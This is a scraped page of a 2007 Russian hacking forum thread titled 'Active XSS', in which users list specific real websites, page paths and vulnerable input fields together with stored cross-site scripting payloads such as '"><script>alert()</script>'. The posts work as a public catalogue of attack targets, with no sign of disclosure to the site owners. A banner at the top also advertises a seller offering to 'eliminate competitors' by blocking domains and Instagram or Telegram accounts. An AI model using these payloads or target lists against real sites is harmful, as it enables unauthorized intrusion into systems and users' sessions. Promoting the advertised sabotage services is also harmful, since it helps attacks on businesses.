Форум АНТИЧАТ - Активные Xss

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Активные Xss

Страница 3 из 41

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#21

08.04.2007, 13:27

+toxa+

[Лишённый самовыражени

Регистрация: 16.01.2005

Сообщений: 1,787

Провел на форуме:
9751379

Репутация: 3812

Отправить сообщение для +toxa+ с помощью ICQ

Отправить сообщение для +toxa+ с помощью AIM

buka.ru
в камментах к новостям
' любезно заменяются на "

__________________

#22

08.04.2007, 15:12

freddi

Постоянный

Регистрация: 05.07.2006

Сообщений: 458

Провел на форуме:
2943499

Репутация: 807

warlog.info

Заходим в настройки сайта. Уязвимо поле "Название"

Код:

<script>alert();</script>

Теперь при просмотре статистики сайта на главной странице вылезает алерт.

#23

11.04.2007, 13:20

Isis

Флудер

Регистрация: 20.11.2006

Сообщений: 3,316

Провел на форуме:
16641028

Репутация: 2371

Downloads.ru

Выбираем любой файл....пишем к нему комментарий...
Все поля уязвимые т.е. мыло, ник и сообщение ...

Код:

"><script>alert("xss")</script>

Пример

Последний раз редактировалось Isis; 11.04.2007 в 13:22..

#24

13.04.2007, 00:24

XTErner

Участник форума

Регистрация: 13.03.2007

Сообщений: 120

Провел на форуме:
1604641

Репутация: 590

ukrtelecom.ua
http://lib.kost.dn.ukrtelecom.ua/guestbook.php

#25

13.04.2007, 21:48

freddi

Постоянный

Регистрация: 05.07.2006

Сообщений: 458

Провел на форуме:
2943499

Репутация: 807

liveinternet.ru

В дневниках.
1) Пишем личное сообщение. Уязвимо поле "Заголовок:"

Код:

"><script>alert();</script>

Если пользователь ответит на это сообщение, то велезет алерт.

2) Добавляем новость в дневник. Уязвимо поле "Добавление новости:"

Код:

"><script>alert();</script>

Последний раз редактировалось freddi; 13.04.2007 в 22:29..

#26

16.04.2007, 00:13

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

Отправить сообщение для n1†R0x с помощью ICQ

2 »Atom1c«

пост №16
http://forum.antichat.ru/showpost.ph...5&postcount=16

#27

18.04.2007, 23:39

[dword]

Участник форума

Регистрация: 11.04.2007

Сообщений: 103

Провел на форуме:
1006699

Репутация: 273

Отправить сообщение для [dword] с помощью ICQ

zip-2002,

Код:

http://www.zip-2002.ru/forum/new.php?t=1&cat=3

В форме сообщения вводим: <script>alert();</script>

#28

19.04.2007, 00:40

[dword]

Участник форума

Регистрация: 11.04.2007

Сообщений: 103

Провел на форуме:
1006699

Репутация: 273

Сайт: http://aktiv.kak-ya.ru/
Путь: http://aktiv.kak-ya.ru/by/ole4ka/2006/04/26/3434/comments
Уязвимое поле: Заголовок

Код:

 
"><script>alert("hek \nActive_jaja")</script>

Сайт: http://forum.allsoch.ru/
Путь: http://forum.allsoch.ru/showthread.php3?s=11&threadid=17076
Уязвимое поле: Ваш ответ.

Код:

 
"><script>alert()</script>

Последний раз редактировалось [dword]; 19.04.2007 в 08:12..

#29

22.04.2007, 14:26

_GaLs_

Постоянный

Регистрация: 21.04.2006

Сообщений: 540

Провел на форуме:
1310036

Репутация: 726

Отправить сообщение для _GaLs_ с помощью ICQ

http://www.booka.ru/

Вставить в поле Поиск

Код:

"><script>alert()</script>

http://www.oplachu.ru/tov226182.html

Вставить в поле Ваш комментарий

Код:

"><script>alert()</script>

http://catalog.kgbi.ru/
http://catalog.designatelie.ru

Вставить в поле Поиска

Код:

"><script>alert()</script>

Последний раз редактировалось _GaLs_; 22.04.2007 в 14:42..

#30

22.04.2007, 14:44

[dword]

Участник форума

Регистрация: 11.04.2007

Сообщений: 103

Провел на форуме:
1006699

Репутация: 273

Цитата:

http://www.booka.ru/

Вставить в поле Поиск

Код:

"><script>alert()</script>

Gals, это же пассивная xss.

Сайт: http://www.photo-cult.com/
Путь: http://www.photo-cult.com/showpic.php?rate&id=187916
Уязвимое поле: Коментар

Код:

"><script>alert()</script>

Страница 3 из 41

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Xss	bx_N	Forum for discussion of ANTICHAT	7	11.03.2007 19:17
mylivepage.ru активные XSS	__XT__	Уязвимости	3	23.12.2006 14:31
Xss для новичков	Micr0b	Уязвимости	0	04.06.2006 18:25

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход